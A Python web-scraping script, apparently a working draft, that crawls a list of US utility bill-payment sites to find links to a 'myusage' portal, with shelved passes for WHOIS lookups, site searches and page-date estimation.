New_Utility_Links = ['https://www.ci.richland.wa.us/departments/energy-services', 'https://cityofcovington.org/index.php?section=covington_utilities3', 'http://unioncitytn.gov/pay-online.html', 'https://dicksonelectric.com/', 'https://www.jea.com/my_account/billing_and_payment_options/', 'https://www.mtpleasant-tn.gov/utility-payments', 'https://www.sepb.net/payment-2/bill-pay/', 'https://www.fulton-ky.com/frequently-asked-questions/', 'https://www.cityofblueridgega.gov/WastewaterandWater.aspx', 'https://midstateelectric.coop/payment-options', 'https://wkrecc.com/index.php/18-billing', 'https://mdec.org/', 'https://www.mlgw.com/residential/payingyourbill_b', 'https://www.caneyforkec.com/', 'https://www.humboldtutilities.com/', 'http://www.hsutilities.com/', 'https://www.cityofmadison.com/water', 'https://hop-electric.com/electric/residential-electric/bill-payment-options/', 'https://ace-power.com/account/payment-options/', 'https://www.ocalafl.org/government/city-departments-a-h/customer-service-office/pay-my-bill', 'https://www.bolivarutility.com/', 'https://lakeworthbeachfl.gov/payment-portal/', 'https://www.wilsonnc.org/residents/all-departments/financial-services/customer-service-and-business-operations/payment-options', 'https://www.bpu.com/', 'https://www.cityofdenton.com/en-us/pay-my-bill', 'https://www.stemc.com/my-payment-options', 'https://www.dixie.coop/online-account-access', 'https://www.orangecountyfl.net/WaterGarbageRecycling/BillPaymentOptions.aspx', 'https://cityofblakely.net/pay-online/', 'https://www.epbnet.com/index.php/support/bill-pay/', 'http://www.bcestn.org/index.php/manage-existing-service/pay-my-monthly-bill/106-pay-by-phone-or-online', 'https://www.salemmo.com/city/government/departments/utility_department/index.php', 'https://www.lexingtontn.gov/pay_online.html', 'https://www.newbernnc.gov/departments/administration/finance/utilities_business_office/pay_my_bill.php', 'https://www.tsemc.net/my-account/pay-bill-online/', 'https://cpws.com/my-account/', 'https://www.lcub.com/', 'https://www.dothan.org/175/Pay-View-Utility-Bill-Online', 'http://www.pickwickec.com/bill-payment-information/', 'https://www.wilsonnc.org/residents/all-departments/financial-services/customer-service-and-business-operations/payment-options', 'https://www.tombigbeeelectric.com/payments', 'https://cityofrockwood.com/online-bill-pay', 'http://www.shelbyvillepower.com/', 'https://www.yourubt.com/', 'http://www.clintonutilities.com/pmtopts.html', 'https://www.rse.coop/', 'https://www.geus.org/', 'https://selma-nc.com/departments/customer-service/', 'http://www.clevelandutilities.com/', 'https://www.mayfieldews.com/index.php/electric/smartpay', 'https://guntersvilleal.org/departments/utilites/', 'https://ripleypower.com/account/payment-options.php', 'http://www.mub-albertville.com/', 'http://www.franklinepb.com/bill-payment-options', 'https://lagrangenc.com/703/Online-Billing', 'https://www.cityofdouglasga.gov/84/Make-a-Utility-Payment', 'https://www.townofbenson.com/2191/Bill-Payment', 'https://www.scecnet.net/content/pay-my-bill', 'http://www.glasgowepb.net/?page_id=343', 'https://www.needhelppayingbills.com/html/tarrant_county_assistance_prog.html', 'https://www.tvec.com/index.asp?fullsite=1']
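# The triple-quoted blocks below are one-off scraping passes kept as strings
# so they can be re-enabled individually: googlesearch to find official
# sites, htmldate to estimate page publication dates, pandas to pull the
# customer sheet, and whois to recover domain registrant names.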
"""
for i in query:
for j in search("Official government website for " + i, tld="co.in", num=1, stop=1, pause=3):
print(j)
"""
"""
find_date('http://blog.python.org/2016/12/python-360-is-now-available.html')
for i in utility_links:
if i == "https://www.caneyforkec.com" or i == "https://lakeworthbeachfl.gov/payment-portal/" or i == "https://midstateelectric.coop/payment-options" or i == "https://www.rse.coop/" or i == "https://www.stemc.com/my-payment-options" or i == "https://www.scecnet.net/content/pay-my-bill" or i == "https://www.tsemc.net/my-account/pay-bill-online/" or i == "http://unioncitytn.gov/pay-online.html":
print("None")
else:
print(find_date(i, original_date=True))
# pip htmldate -max MAXDATE -u [utility_links]
"""
"""
print(""*5)
for i in gov_links:
if i == "https://www.caneyforkec.com" or i == "https://lakeworthbeachfl.gov/payment-portal/" or i == "https://midstateelectric.coop/payment-options" or i == "https://www.rse.coop/" or i == "https://www.stemc.com/my-payment-options" or i == "https://www.scecnet.net/content/pay-my-bill" or i == "https://www.tsemc.net/my-account/pay-bill-online/" or i == "http://unioncitytn.gov/pay-online.html":
print("None")
else:
print(find_date(i, original_date=True))
print(""*5)
"""
"""
import whois
w = whois.whois('https://www.humboldtutilities.com/')
print(w)
"""
"""
customers_url = "https://docs.google.com/spreadsheets/d/e/2PACX-1vQcmuZiLz645g0LV2MetG-9Uj4EeTxGMVGPR7D4U88hh-pgEyLKM7nVAuC3k4-6peJ6MevszPQ01IE5/pub?output=csv"
customers_df = pd.read_csv(customers_url)
customers_df = customers_df.loc[:, customers_df.columns.intersection(["Customer","Reed Link"])]
customers_df['Reed Link'] = customers_df['Reed Link'].replace(np.nan, 0)
customers_df.rename(columns = {"Reed Link": "Reed_Link"}, inplace=True)
df_new = customers_df.query("Reed_Link==0")
df_new.set_index("Customer")
ukn = df_new["Customer"].tolist()
for i in ukn:
for j in search("Utility website for " + i, tld="co.in", num=1, stop=1, pause=3):
print(j)
"""
"""
import whois
import json
import time
New_Utility_Links = ['https://www.ci.richland.wa.us/departments/energy-services', 'https://cityofcovington.org/index.php?section=covington_utilities3', 'http://unioncitytn.gov/pay-online.html', 'https://dicksonelectric.com/', 'https://www.jea.com/my_account/billing_and_payment_options/', 'https://www.mtpleasant-tn.gov/utility-payments', 'https://www.sepb.net/payment-2/bill-pay/', 'https://www.fulton-ky.com/frequently-asked-questions/', 'https://www.cityofblueridgega.gov/WastewaterandWater.aspx', 'https://midstateelectric.coop/payment-options', 'https://wkrecc.com/index.php/18-billing', 'https://mdec.org/', 'https://www.mlgw.com/residential/payingyourbill_b', 'https://www.caneyforkec.com/', 'https://www.humboldtutilities.com/', 'http://www.hsutilities.com/', 'https://www.cityofmadison.com/water', 'https://hop-electric.com/electric/residential-electric/bill-payment-options/', 'https://ace-power.com/account/payment-options/', 'https://www.ocalafl.org/government/city-departments-a-h/customer-service-office/pay-my-bill', 'https://www.bolivarutility.com/', 'https://lakeworthbeachfl.gov/payment-portal/', 'https://www.wilsonnc.org/residents/all-departments/financial-services/customer-service-and-business-operations/payment-options', 'https://www.bpu.com/', 'https://www.cityofdenton.com/en-us/pay-my-bill', 'https://www.stemc.com/my-payment-options', 'https://www.dixie.coop/online-account-access', 'https://www.orangecountyfl.net/WaterGarbageRecycling/BillPaymentOptions.aspx', 'https://cityofblakely.net/pay-online/', 'https://www.epbnet.com/index.php/support/bill-pay/', 'http://www.bcestn.org/index.php/manage-existing-service/pay-my-monthly-bill/106-pay-by-phone-or-online', 'https://www.salemmo.com/city/government/departments/utility_department/index.php', 'https://www.lexingtontn.gov/pay_online.html', 'https://www.newbernnc.gov/departments/administration/finance/utilities_business_office/pay_my_bill.php', 'https://www.tsemc.net/my-account/pay-bill-online/', 'https://cpws.com/my-account/', 'https://www.lcub.com/', 'https://www.dothan.org/175/Pay-View-Utility-Bill-Online', 'http://www.pickwickec.com/bill-payment-information/', 'https://www.wilsonnc.org/residents/all-departments/financial-services/customer-service-and-business-operations/payment-options', 'https://www.tombigbeeelectric.com/payments', 'https://cityofrockwood.com/online-bill-pay', 'http://www.shelbyvillepower.com/', 'https://www.yourubt.com/', 'http://www.clintonutilities.com/pmtopts.html', 'https://www.rse.coop/', 'https://www.geus.org/', 'https://selma-nc.com/departments/customer-service/', 'http://www.clevelandutilities.com/', 'https://www.mayfieldews.com/index.php/electric/smartpay', 'https://guntersvilleal.org/departments/utilites/', 'https://ripleypower.com/account/payment-options.php', 'http://www.mub-albertville.com/', 'http://www.franklinepb.com/bill-payment-options', 'https://lagrangenc.com/703/Online-Billing', 'https://www.cityofdouglasga.gov/84/Make-a-Utility-Payment', 'https://www.townofbenson.com/2191/Bill-Payment', 'https://www.scecnet.net/content/pay-my-bill', 'http://www.glasgowepb.net/?page_id=343', 'https://www.needhelppayingbills.com/html/tarrant_county_assistance_prog.html', 'https://www.tvec.com/index.asp?fullsite=1']
DNS_0, DNS_1, DNS_2, DNS_3, DNS_4 = [], [], [], [], []
t = 5  # seconds to pause between lookups, to stay polite to the whois servers
# Five identical passes over the link list; the cells below consolidate the columns.
for dns in (DNS_0, DNS_1, DNS_2, DNS_3, DNS_4):
    for i in New_Utility_Links:
        data = whois.whois(i)
        if "name" in data:
            dns.append(data["name"])
        elif "registrant_name" in data:
            dns.append(data["registrant_name"])
        elif "admin_name" in data:
            dns.append(data["admin_name"])
        else:
            dns.append("None")
        time.sleep(t)
DNS_df = pd.DataFrame(
{'DNS_0': DNS_0,
'DNS_1': DNS_1,
'DNS_2': DNS_2,
'DNS_3': DNS_3,
'DNS_4': DNS_4,
})
print(DNS_df)
DNS_df.replace(to_replace ="none", value ="nan")
DNS_df.replace(to_replace ="None", value ="nan")
print(DNS_df)
DNS_df["DNS_0"].fillna(DNS_df["DNS_1"])
DNS_df["DNS_0"].fillna(DNS_df["DNS_2"])
DNS_df["DNS_0"].fillna(DNS_df["DNS_3"])
DNS_df["DNS_0"].fillna(DNS_df["DNS_4"])
print(DNS_df)
DNS_df = DNS_df.drop(["DNS_1", "DNS_2", "DNS_3", "DNS_4"], axis=1)
print(DNS_df)
final = DNS_df["DNS_0"].tolist()
for i in final:
print(i)
"""
"""
import whois
import json
import time
New_Utility_Links = ['https://www.ci.richland.wa.us/departments/energy-services', 'https://cityofcovington.org/index.php?section=covington_utilities3', 'http://unioncitytn.gov/pay-online.html', 'https://dicksonelectric.com/', 'https://www.jea.com/my_account/billing_and_payment_options/', 'https://www.mtpleasant-tn.gov/utility-payments', 'https://www.sepb.net/payment-2/bill-pay/', 'https://www.fulton-ky.com/frequently-asked-questions/', 'https://www.cityofblueridgega.gov/WastewaterandWater.aspx', 'https://midstateelectric.coop/payment-options', 'https://wkrecc.com/index.php/18-billing', 'https://mdec.org/', 'https://www.mlgw.com/residential/payingyourbill_b', 'https://www.caneyforkec.com/', 'https://www.humboldtutilities.com/', 'http://www.hsutilities.com/', 'https://www.cityofmadison.com/water', 'https://hop-electric.com/electric/residential-electric/bill-payment-options/', 'https://ace-power.com/account/payment-options/', 'https://www.ocalafl.org/government/city-departments-a-h/customer-service-office/pay-my-bill', 'https://www.bolivarutility.com/', 'https://lakeworthbeachfl.gov/payment-portal/', 'https://www.wilsonnc.org/residents/all-departments/financial-services/customer-service-and-business-operations/payment-options', 'https://www.bpu.com/', 'https://www.cityofdenton.com/en-us/pay-my-bill', 'https://www.stemc.com/my-payment-options', 'https://www.dixie.coop/online-account-access', 'https://www.orangecountyfl.net/WaterGarbageRecycling/BillPaymentOptions.aspx', 'https://cityofblakely.net/pay-online/', 'https://www.epbnet.com/index.php/support/bill-pay/', 'http://www.bcestn.org/index.php/manage-existing-service/pay-my-monthly-bill/106-pay-by-phone-or-online', 'https://www.salemmo.com/city/government/departments/utility_department/index.php', 'https://www.lexingtontn.gov/pay_online.html', 'https://www.newbernnc.gov/departments/administration/finance/utilities_business_office/pay_my_bill.php', 'https://www.tsemc.net/my-account/pay-bill-online/', 'https://cpws.com/my-account/', 'https://www.lcub.com/', 'https://www.dothan.org/175/Pay-View-Utility-Bill-Online', 'http://www.pickwickec.com/bill-payment-information/', 'https://www.wilsonnc.org/residents/all-departments/financial-services/customer-service-and-business-operations/payment-options', 'https://www.tombigbeeelectric.com/payments', 'https://cityofrockwood.com/online-bill-pay', 'http://www.shelbyvillepower.com/', 'https://www.yourubt.com/', 'http://www.clintonutilities.com/pmtopts.html', 'https://www.rse.coop/', 'https://www.geus.org/', 'https://selma-nc.com/departments/customer-service/', 'http://www.clevelandutilities.com/', 'https://www.mayfieldews.com/index.php/electric/smartpay', 'https://guntersvilleal.org/departments/utilites/', 'https://ripleypower.com/account/payment-options.php', 'http://www.mub-albertville.com/', 'http://www.franklinepb.com/bill-payment-options', 'https://lagrangenc.com/703/Online-Billing', 'https://www.cityofdouglasga.gov/84/Make-a-Utility-Payment', 'https://www.townofbenson.com/2191/Bill-Payment', 'https://www.scecnet.net/content/pay-my-bill', 'http://www.glasgowepb.net/?page_id=343', 'https://www.needhelppayingbills.com/html/tarrant_county_assistance_prog.html', 'https://www.tvec.com/index.asp?fullsite=1']
DNS_0, DNS_1, DNS_2, DNS_3, DNS_4 = [], [], [], [], []
t = 5  # pause between lookups
# Same five-pass scheme as above, but collecting the registrar instead of the name.
for dns in (DNS_0, DNS_1, DNS_2, DNS_3, DNS_4):
    for i in New_Utility_Links:
        data = whois.whois(i)
        if "registrar" in data:
            dns.append(data["registrar"])
        elif "registrar_name" in data:
            dns.append(data["registrar_name"])
        else:
            dns.append("None")
        time.sleep(t)
DNS_df = pd.DataFrame(
{'DNS_0': DNS_0,
'DNS_1': DNS_1,
'DNS_2': DNS_2,
'DNS_3': DNS_3,
'DNS_4': DNS_4,
})
print(DNS_df)
DNS_df.replace(to_replace ="none", value ="nan")
DNS_df.replace(to_replace ="None", value ="nan")
print(DNS_df)
DNS_df["DNS_0"].fillna(DNS_df["DNS_1"])
DNS_df["DNS_0"].fillna(DNS_df["DNS_2"])
DNS_df["DNS_0"].fillna(DNS_df["DNS_3"])
DNS_df["DNS_0"].fillna(DNS_df["DNS_4"])
print(DNS_df)
DNS_df = DNS_df.drop(["DNS_1", "DNS_2", "DNS_3", "DNS_4"], axis=1)
print(DNS_df)
final = DNS_df["DNS_0"].tolist()
for i in final:
print(i)
"""
"""
# initialize the set of links (unique links)
internal_urls = set()
external_urls = set()
total_urls_visited = 0
urls = []

def is_valid(url):
    parsed = urlparse(url)
    return bool(parsed.netloc) and bool(parsed.scheme)

def get_all_website_links(url):
    # all URLs of `url`
    urls = set()
    # domain name of the URL without the protocol
    domain_name = urlparse(url).netloc
    soup = BeautifulSoup(requests.get(url).content, "html.parser")
    for a_tag in soup.findAll("a"):
        href = a_tag.attrs.get("href")
        if href == "" or href is None:
            # href empty tag
            continue
        # join the URL if it's relative (not absolute link)
        href = urljoin(url, href)
        parsed_href = urlparse(href)
        # remove URL GET parameters, URL fragments, etc.
        href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
        if not is_valid(href):
            # not a valid URL
            continue
        if href in internal_urls:
            # already in the set
            continue
        if domain_name not in href:
            # external link
            if href not in external_urls:
                #print(f"{GRAY}[!] External link: {href}{RESET}")
                external_urls.add(href)
            continue
        #print(f"{GREEN}[*] Internal link: {href}{RESET}")
        urls.add(href)
        internal_urls.add(href)
    return urls

def crawl(url, max_urls=30):
    global total_urls_visited
    total_urls_visited += 1
    #print(f"{YELLOW}[*] Crawling: {url}{RESET}")
    links = get_all_website_links(url)
    for link in links:
        if total_urls_visited > max_urls:
            break
        crawl(link, max_urls=max_urls)
"""
"""
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
import time
query = "myusage"
query_return = []
for i in New_Utility_Links:
    try:
        print("Testing " + i)
        # Test the 1st page & capture all internal and external links,
        # then test all internal pages for the query
        internal_urls = []
        external_urls = []
        domain_name = urlparse(i).netloc
        req = requests.get(i)
        soup = BeautifulSoup(req.content, 'html.parser')
        for tag in soup.findAll("a"):
            href = tag.attrs.get("href")
            if href == "" or href is None:
                continue
            href = urljoin(i, href)
            parsed_href = urlparse(href)
            href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
            if domain_name not in href:
                if href not in external_urls:
                    if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
                        # "and", not "or": chaining the exclusions with "or" is always true
                        if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
                            external_urls.append(href)
                continue
            else:
                if href not in internal_urls:
                    if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
                        if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
                            internal_urls.append(href)
                continue
        #print(str(len(internal_urls)))
        #print(str(len(external_urls)))
        # substring check: "query in external_urls" would test list membership, not substrings
        if any(query in link for link in external_urls):
            query_return.append("True")
        else:
            for j in internal_urls:
                try:
                    #print("Testing " + j + " inside of " + i)
                    req = requests.get(j)
                    soup = BeautifulSoup(req.content, 'html.parser')
                    for tag in soup.findAll("a"):
                        href = tag.attrs.get("href")
                        if href == "" or href is None:
                            continue
                        href = urljoin(j, href)
                        parsed_href = urlparse(href)
                        href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
                        if href in external_urls:
                            continue
                        if domain_name not in href:
                            if href not in external_urls:
                                if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
                                    if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
                                        external_urls.append(href)
                        continue
                except Exception:
                    continue
            checks = []
            for exlink in external_urls:
                if query in exlink:
                    checks.append("True")
                else:
                    checks.append("False")
            if "True" in checks:
                query_return.append("True")
            else:
                query_return.append("False")
    except Exception:
        query_return.append("Failure")
for boolean in query_return:
    print(boolean)
"""
"""
#JEA 500?
import pandas as pd
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
import time
import os
query = "myusage"
query_return = []
for i in New_Utility_Links:
try:
df = pd.DataFrame({"URL":[i],"BOOL":["True"]})
external_urls = []
domain_name = urlparse(i).netloc
req = requests.get(i)
soup = BeautifulSoup(req.content, 'html.parser')
for tag in soup.findAll("a"):
os.system('cls')
print(df)
print(""*2)
print("Testing " + i)
href = tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(i, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
# URL TRACKING
if domain_name not in href:
if href not in external_urls:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href or ".DOC" not in href or ".DOCX" not in href:
external_urls.append(href)
continue
else:
if href not in df["URL"]:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
append_list = (href, "False")
df_length = len(df)
df.loc[df_length] = append_list
continue
# URL TESTING
if any(query in link for link in external_urls):  # substring test, not list membership
query_return.append("True")
else:
for j in df["URL"]:
if df.loc[df['URL'] == j, 'BOOL'].iloc[0] == "False":
try:
# Start Time
state = "True"
max_time = 15
start_time = time.time() # remember when we started
while (time.time() - start_time) < max_time and state == "True":
# End Time
#print("Testing " + j + " inside of " + i)
df.loc[df['URL'] == j, 'BOOL'].iloc[0] = "True"
req = requests.get(j)
soup = BeautifulSoup(req.content, 'html.parser')
for tag in soup.findAll("a"):
href = tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(j, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
# URL TRACKING
if href in external_urls:
continue
if domain_name not in href:
if href not in external_urls:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href or ".DOC" not in href or ".DOCX" not in href:
external_urls.append(href)
checks = []
for exlink in external_urls:
if query in exlink:
checks.append("True")
else:
checks.append("False")
if "True" in checks:
query_return.append("True")
state = "False"
else:
if href not in df["URL"]:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
append_list = (href, "False")
df_length = len(df)
df.loc[df_length] = append_list
continue
except:
continue
else:
continue
checks = []
for exlink in external_urls:
if query in exlink:
checks.append("True")
else:
checks.append("False")
if "True" in checks:
query_return.append("True")
else:
query_return.append("False")
except:
query_return.append("Failure")
for boolean in query_return:
print(boolean)
"""
"""
#JEA 500?
import pandas as pd
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
import time
import os
query = "myusage"
query_return = []
for i in New_Utility_Links:
try:
df = pd.DataFrame({"URL":[i],"BOOL":["True"]})
external_urls = []
domain_name = urlparse(i).netloc
req = requests.get(i)
soup = BeautifulSoup(req.content, 'html.parser')
for tag in soup.findAll("a"):
os.system('cls')
print(df)
print(""*2)
print("Testing " + i)
href = tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(i, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
# URL TRACKING
if domain_name not in href:
if href not in external_urls:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href or ".DOC" not in href or ".DOCX" not in href:
external_urls.append(href)
continue
else:
if href not in df["URL"]:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
append_list = (href, "False")
df_length = len(df)
df.loc[df_length] = append_list
continue
# URL TESTING
if any(query in link for link in external_urls):
query_return.append("True")
else:
for j in df["URL"]:
if df.loc[df['URL'] == j, 'BOOL'].iloc[0] == "False":
try:
#print("Testing " + j + " inside of " + i)
df.loc[df['URL'] == j, 'BOOL'] = "True"  # plain .loc: chained .iloc assignment writes to a copy
req = requests.get(j)
soup = BeautifulSoup(req.content, 'html.parser')
for tag in soup.findAll("a"):
href = tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(j, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
# URL TRACKING
if href in external_urls:
continue
if domain_name not in href:
if href not in external_urls:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href or ".DOC" not in href or ".DOCX" not in href:
external_urls.append(href)
else:
if href not in df["URL"]:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
append_list = (href, "False")
df_length = len(df)
df.loc[df_length] = append_list
continue
except:
continue
else:
continue
checks = []
for exlink in external_urls:
if query in exlink:
checks.append("True")
else:
checks.append("False")
if "True" in checks:
query_return.append("True")
else:
query_return.append("False")
except:
query_return.append("Failure")
for boolean in query_return:
print(boolean)
"""
"""
import pandas as pd
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
import time
import os
query = "myusage"
query_return = []
for i in New_Utility_Links:
try:
df = pd.DataFrame({"URL":[i],"BOOL":["True"]})
external_urls = []
domain_name = urlparse(i).netloc
req = requests.get(i)
soup = BeautifulSoup(req.content, 'html.parser')
for tag in soup.findAll("a"):
os.system('cls')
print(df)
print(""*2)
print("Testing " + i)
href = tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(i, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
# URL TRACKING
if domain_name not in href:
if href not in external_urls:
if ".pdf" not in href or ".DOC" not in href or ".DOCX" not in href:
external_urls.append(href)
continue
else:
if href not in df["URL"].tolist():
if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
append_list = (href, "False")
df_length = len(df)
df.loc[df_length] = append_list
continue
# URL TESTING
if any(query in link for link in external_urls):
query_return.append("True")
else:
num = 0
for j in df["URL"].tolist():
if df.loc[df['URL'] == j, 'BOOL'].iloc[0] == "False":
try:
# Start Time (set before it is printed, or the first pass raises NameError)
os.system('cls')
num += 1
state = "True"
max_time = 15
start_time = time.time() # remember when we started
print(str(time.time() - start_time))
print(str(len(df["URL"].tolist())))
print(str(num))
while (time.time() - start_time) < max_time and state == "True":
print(len(df["URL"]))
# End Time
#print("Testing " + j + " inside of " + i)
df.loc[df['URL'] == j, 'BOOL'] = "True"  # plain .loc: chained .iloc assignment writes to a copy
req = requests.get(j)
soup = BeautifulSoup(req.content, 'html.parser')
for tag in soup.findAll("a"):
href = tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(j, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
# URL TRACKING
if href in external_urls:
continue
if domain_name not in href:
if href not in external_urls:
if ".pdf" not in href or ".DOC" not in href or ".DOCX" not in href:
external_urls.append(href)
checks = []
for exlink in external_urls:
if query in exlink:
checks.append("True")
else:
checks.append("False")
if "True" in checks:
query_return.append("True")
state = "False"
else:
if href not in df["URL"]:
if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
append_list = (href, "False")
df_length = len(df)
df.loc[df_length] = append_list
continue
except:
continue
else:
continue
checks = []
for exlink in external_urls:
if query in exlink:
checks.append("True")
else:
checks.append("False")
if "True" in checks:
query_return.append("True")
else:
query_return.append("False")
except:
query_return.append("Failure")
for boolean in query_return:
print(boolean)
"""
# Final... Compare the final_df to other variations to affirm reliability and ensure more accurate results
import pandas as pd
import numpy as np
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
import time
import os

query = "myusage"
req_run = int(input("How many times would you like to run this script?: "))
query_ret_dfs = []
final_df = pd.DataFrame()
for run in range(req_run):  # a separate name for the run index: the link loop below also uses "i"
    df_name = "df%d" % run
    query_return = []  # reset per run so every run contributes exactly one value per link
    for i in New_Utility_Links:
        try:
            df = pd.DataFrame({"URL": [i], "BOOL": ["True"]})
            external_urls = []
            domain_name = urlparse(i).netloc
            req = requests.get(i)
            soup = BeautifulSoup(req.content, 'html.parser')
            for tag in soup.findAll("a"):
                os.system('cls')
                print(df)
                print("\n" * 2)
                print("Testing " + i)
                href = tag.attrs.get("href")
                if href == "" or href is None:
                    continue
                href = urljoin(i, href)
                parsed_href = urlparse(href)
                href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
                # URL TRACKING
                if domain_name not in href:
                    if href not in external_urls:
                        if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
                            external_urls.append(href)
                    continue
                else:
                    if href not in df["URL"].tolist():
                        if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
                            df.loc[len(df)] = (href, "False")
                    continue
            # URL TESTING
            if any(query in link for link in external_urls):
                query_return.append("True")
            else:
                num = 0
                for j in df["URL"].tolist():
                    if df.loc[df['URL'] == j, 'BOOL'].iloc[0] == "False":
                        try:
                            # Start Time (set before it is printed, or the first pass raises NameError)
                            os.system('cls')
                            num += 1
                            state = "True"
                            max_time = 20
                            start_time = time.time()  # remember when we started
                            print(str(time.time() - start_time))
                            print(str(len(df["URL"].tolist())))
                            print(str(num))
                            #print("Testing " + j + " inside of " + i)
                            df.loc[df['URL'] == j, 'BOOL'] = "True"  # plain .loc: chained .iloc assignment writes to a copy
                            req = requests.get(j)
                            soup = BeautifulSoup(req.content, 'html.parser')
                            for tag in soup.findAll("a"):
                                # End Time: stop scanning this page once the budget is spent
                                if (time.time() - start_time) >= max_time or state == "False":
                                    break
                                href = tag.attrs.get("href")
                                if href == "" or href is None:
                                    continue
                                href = urljoin(j, href)
                                parsed_href = urlparse(href)
                                href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
                                # URL TRACKING
                                if href in external_urls:
                                    continue
                                if domain_name not in href:
                                    if href not in external_urls:
                                        if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
                                            external_urls.append(href)
                                    if any(query in exlink for exlink in external_urls):
                                        state = "False"  # found a hit; the checks below record it once
                                else:
                                    if href not in df["URL"].tolist():
                                        if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
                                            df.loc[len(df)] = (href, "False")
                        except Exception:
                            continue
                    else:
                        continue
                checks = []
                for exlink in external_urls:
                    if query in exlink:
                        checks.append("True")
                    else:
                        checks.append("False")
                if "True" in checks:
                    query_return.append("True")
                else:
                    query_return.append("False")
        except Exception:
            query_return.append("Failure")
    #print(query_ret_dfs)
    run_df = pd.DataFrame({df_name: query_return})
    query_ret_dfs.append(run_df)
    #print(run_df)

if len(query_ret_dfs) >= 2:
    final_df = pd.concat(query_ret_dfs, axis=1)  # concatenate every run, not just the first and last
    print(final_df)
    # replace()/fillna() return new objects, so assign the results back
    final_df = final_df.replace(to_replace=["False", "Failure"], value=np.nan)
    for col in final_df.columns:
        final_df["df0"] = final_df["df0"].fillna(final_df[col])
    print(final_df)
    final_df = final_df[["df0"]]  # keep only the consolidated column
    print(final_df)
    final = final_df["df0"].tolist()
    for i in final:
        print(i)
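# The comment at the top of this cell calls for comparing final_df against the
# other variations to affirm reliability; one simple comparison is a majority
# vote across the run columns (a sketch, assuming final_df holds one
# "True"/"False" column per run):
def majority_vote(df):
    # DataFrame.mode(axis=1) gives the most frequent value(s) per row;
    # column 0 picks a single winner even when rows tie
    return df.mode(axis=1)[0]

# e.g. final_df["consensus"] = majority_vote(final_df)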
"""
FOR TESTING
Wiper is cool, good thing about it is I don't have to type '()' around it. Here is slight variation to it
# wiper.py
import os
class Cls(object):
def __repr__(self):
os.system('cls')
return ''
The usage is quite simple:
>>> cls = Cls()
>>> cls # this will clear console.
TIMER THREADING AKA DAEMON THREADING
from time import sleep
from threading import Thread
def some_task():
while True:
pass
t = Thread(target=some_task) # run the some_task function in another
# thread
t.daemon = True # Python will exit when the main thread
# exits, even if this thread is still
# running
t.start()
snooziness = int(raw_input('Enter the amount of seconds you want to run this: '))
sleep(snooziness)
# Since this is the end of the script, Python will now exit. If we
# still had any other non-daemon threads running, we wouldn't exit.
# However, since our task is a daemon thread, Python will exit even if
# it's still going.
WHILE "THREAD"
import time
max_time = int(raw_input('Enter the amount of seconds you want to run this: '))
start_time = time.time() # remember when we started
while (time.time() - start_time) < max_time:
do_stuff()
"""
"""
ALL FUNCTIONS IN A CLASS
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
import argparse
import pandas as pd
class Dataset:
# Constructor
def __init__(self, names, search_query):
self.names = names
self.search_query = search_query
'''
parser = argparse.ArgumentParser()
parser.add_argument("names",)
parser.add_argument("search_query", help="This is required for scraping a link to a website from a name...")
'''
def get_website(self):
